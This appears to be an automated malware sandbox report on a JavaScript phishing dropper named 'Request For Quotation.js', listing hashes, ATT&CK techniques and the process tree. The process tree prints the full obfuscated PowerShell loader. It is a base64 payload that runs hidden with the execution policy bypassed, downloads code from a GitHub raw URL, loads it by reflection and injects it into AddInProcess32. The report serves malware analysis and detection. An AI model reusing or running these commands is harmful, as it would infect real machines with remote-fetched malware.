c35922ffe621f1719e7346a3fa7ba779766c44481ed2ad785782cc7bf693376c

General

Target

Request For Quotation.js
Size

131KB
MD5

55f3ba85c0e1546b907ec0f2465f6bac
SHA1

59c6d5157b6cb30040f0226599c99f07c361f822
SHA256

c35922ffe621f1719e7346a3fa7ba779766c44481ed2ad785782cc7bf693376c
SHA512

478496891e630b260802e97f20132adf1b06b22f35b059e9f9176e6e5f777d63184b45c32efbf4981f53f02ecff31640e84661164a90d550a1d061e1edde3d1b
SSDEEP

3072:/N+oukZXE8KRI4V1AulQkcunvyhLZm2MKIvgzJJY6N+oukZXE8KRI4V1AulQkcuz:/xukZ08baeulQ/uni/M5vgzXY6xukZ07

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2668	powershell.exe
6	2668	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2660	powershell.exe
2668	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
4	raw.githubusercontent.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2660	powershell.exe
2668	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2232 wrote to memory of 2660	2232	wscript.exe	30
PID 2232 wrote to memory of 2660	2232	wscript.exe	30
PID 2232 wrote to memory of 2660	2232	wscript.exe	30
PID 2660 wrote to memory of 2668	2660	powershell.exe	32
PID 2660 wrote to memory of 2668	2660	powershell.exe	32
PID 2660 wrote to memory of 2668	2660	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Request For Quotation.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACgAVgBBAHIAaQBBAGIATABlACAAJwAqAE0ARAByACoAJwApAC4AbgBhAG0ARQBbADMALAAxADEALAAyAF0ALQBKAG8AaQBOACcAJwApACAAKAAoACcAbwAnACsAJwBIACcAKwAnAHMAdQByAGwAIAA9ACAAJwArACcAagAwAEwAaAB0AHQAcAAnACsAJwBzACcAKwAnADoAJwArACcALwAvAHIAJwArACcAYQB3AC4AZwBpAHQAJwArACcAaAB1ACcAKwAnAGIAdQBzAGUAJwArACcAcgBjAG8AbgB0AGUAJwArACcAbgB0ACcAKwAnAC4AYwBvAG0ALwBOAG8ARABlACcAKwAnAHQAZQBjACcAKwAnAHQATwBuAC8ATgBvAEQAZQB0ACcAKwAnAGUAYwAnACsAJwB0ACcAKwAnAE8AbgAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQAnACsAJwBuACcAKwAnAC8AJwArACcARABlAHQAYQAnACsAJwBoAE4AJwArACcAbwB0AGUAJwArACcAXwBKAC4AJwArACcAdAAnACsAJwB4AHQAagAnACsAJwAwAEwAOwAnACsAJwAgAG8ASAAnACsAJwBzAGIAYQBzAGUAJwArACcANgA0AEMAbwAnACsAJwBuAHQAZQBuAHQAJwArACcAIAA9ACcAKwAnACAAKABOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwB0ACAAUwB5ACcAKwAnAHMAdABlAG0AJwArACcALgBOAGUAJwArACcAdAAuAFcAZQBiAEMAbAAnACsAJwBpACcAKwAnAGUAbgB0ACkALgBEAG8AdwAnACsAJwBuAGwAJwArACcAbwBhAGQAUwAnACsAJwB0AHIAaQBuAGcAKABvACcAKwAnAEgAJwArACcAcwB1AHIAbAAnACsAJwApACcAKwAnADsAIAAnACsAJwBvAEgAcwBiACcAKwAnAGkAbgBhAHIAeQBDAG8AJwArACcAbgAnACsAJwB0AGUAbgB0ACAAPQAgAFsAUwB5AHMAJwArACcAdABlAG0AJwArACcALgBDAG8AbgB2AGUAcgB0AF0AJwArACcAOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABvAEgAcwBiAGEAJwArACcAcwBlADYANABDAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnACkAOwAgAG8AJwArACcASABzAGEAJwArACcAcwBzACcAKwAnAGUAbQBiAGwAeQAgAD0AIABbAFIAZQAnACsAJwBmAGwAZQBjACcAKwAnAHQAaQBvAG4ALgAnACsAJwBBAHMAJwArACcAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAG8ASABzAGIAaQBuAGEAcgB5AEMAbwBuACcAKwAnAHQAZQAnACsAJwBuAHQAJwArACcAKQA7ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIACcAKwAnAG8AbQBlAF0AOgAnACsAJwA6AFYAQQAnACsAJwBJACgAdABiAE0AdAAnACsAJwB4AHQALgByAHIAbwAvACcAKwAnAHYAZQBkAC4AMgByACcAKwAnAC4AMwA5AGIAMwA0ACcAKwAnADUAMwAwADIAYQAwADcANQBiACcAKwAnADEAYgBjADAAZAAnACsAJwA0ADUAYgA2ADMAMgAnACsAJwBlAGIAJwArACcAOQBlAGUANgAyACcAKwAnAC0AJwArACcAYgB1ACcAKwAnAHAALwAvADoAcwAnACsAJwBwAHQAJwArACcAdABoAHQAJwArACcAYgAnACsAJwBNACwAIAB0AGIATQAnACsAJwBkAGUAcwAnACsAJwBhAHQAaQB2AGEAJwArACcAZABvAHQAYgBNACcAKwAnACwAIAAnACsAJwB0AGIATQBkAGUAcwBhAHQAaQB2AGEAZABvACcAKwAnAHQAYgBNACcAKwAnACwAIAB0AGIATQBkAGUAcwBhACcAKwAnAHQAaQB2AGEAZABvAHQAYgBNACwAJwArACcAIAB0ACcAKwAnAGIATQAnACsAJwBBAGQAJwArACcAZABJAG4AUAByACcAKwAnAG8AYwBlAHMAcwAnACsAJwAzADIAJwArACcAdAAnACsAJwBiAE0ALAAgAHQAJwArACcAYgAnACsAJwBNAGQAZQBzAGEAdAAnACsAJwBpAHYAYQBkAG8AdABiAE0AJwArACcALAB0AGIATQB0AGIATQApACcAKQAuAHIARQBQAEwAYQBjAGUAKAAoAFsAYwBoAEEAcgBdADEAMQA2ACsAWwBjAGgAQQByAF0AOQA4ACsAWwBjAGgAQQByAF0ANwA3ACkALABbAFMAVABSAEkATgBHAF0AWwBjAGgAQQByAF0AMwA0ACkALgByAEUAUABMAGEAYwBlACgAJwBqADAATAAnACwAWwBTAFQAUgBJAE4ARwBdAFsAYwBoAEEAcgBdADMAOQApAC4AcgBFAFAATABhAGMAZQAoACcAbwBIAHMAJwAsAFsAUwBUAFIASQBOAEcAXQBbAGMAaABBAHIAXQAzADYAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((VAriAbLe '*MDr*').namE[3,11,2]-JoiN'') (('o'+'H'+'surl = '+'j0Lhttp'+'s'+':'+'//r'+'aw.git'+'hu'+'buse'+'rconte'+'nt'+'.com/NoDe'+'tec'+'tOn/NoDet'+'ec'+'t'+'On/refs/heads/mai'+'n'+'/'+'Deta'+'hN'+'ote'+'_J.'+'t'+'xtj'+'0L;'+' oH'+'sbase'+'64Co'+'ntent'+' ='+' (New-'+'Object Sy'+'stem'+'.Ne'+'t.WebCl'+'i'+'ent).Dow'+'nl'+'oadS'+'tring(o'+'H'+'surl'+')'+'; '+'oHsb'+'inaryCo'+'n'+'tent = [Sys'+'tem'+'.Convert]'+'::'+'FromBa'+'se64String(oHsba'+'se64Cont'+'ent'+'); o'+'Hsa'+'ss'+'embly = [Re'+'flec'+'tion.'+'As'+'sembly]::Load(oHsbinaryCon'+'te'+'nt'+'); [dnlib.IO.H'+'ome]:'+':VA'+'I(tbMt'+'xt.rro/'+'ved.2r'+'.39b34'+'5302a075b'+'1bc0d'+'45b632'+'eb'+'9ee62'+'-'+'bu'+'p//:s'+'pt'+'tht'+'b'+'M, tbM'+'des'+'ativa'+'dotbM'+', '+'tbMdesativado'+'tbM'+', tbMdesa'+'tivadotbM,'+' t'+'bM'+'Ad'+'dInPr'+'ocess'+'32'+'t'+'bM, t'+'b'+'Mdesat'+'ivadotbM'+',tbMtbM)').rEPLace(([chAr]116+[chAr]98+[chAr]77),[STRING][chAr]34).rEPLace('j0L',[STRING][chAr]39).rEPLace('oHs',[STRING][chAr]36))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ac471eecb7f43053c8989d5e7ab4332

SHA1
64bfba98e417b2d66b7dd1b362c9432739b9757b

SHA256
671b72c025deaac44f2a729f9640fe2d35e01b937eab2b542970be669c087398

SHA512
63886b0114120f0a343c84136ef64653657b0da624e82e3a59ee05739debd8e4e14d8a104845809f35045e59e7c217e76e706b2bea44785a7e8173367f5a1503

Download Submit
memory/2660-4-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp

Filesize
4KB

Download
memory/2660-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2660-7-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2660-6-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2660-8-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2660-9-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2660-11-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2660-10-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2660-17-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing